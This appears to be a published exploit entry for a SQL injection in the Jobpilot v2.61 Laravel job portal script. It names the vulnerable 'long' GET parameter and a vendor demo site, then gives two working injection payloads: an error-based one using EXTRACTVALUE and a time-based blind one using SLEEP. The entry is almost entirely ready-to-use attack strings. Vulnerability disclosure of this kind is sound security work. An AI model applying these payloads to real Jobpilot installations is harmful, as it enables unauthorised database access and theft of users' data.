Jobpilot 2.61 SQL Injection

# Exploit Title: Jobpilot v2.61 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822# Demo Site: https://jobpilot.templatecookie.com# Tested on: Kali Linux# CVE: N/A----- PoC: SQLi -----Parameter: long (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT(ELT(4894=4894,1))),0x71786b7171)) AND(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=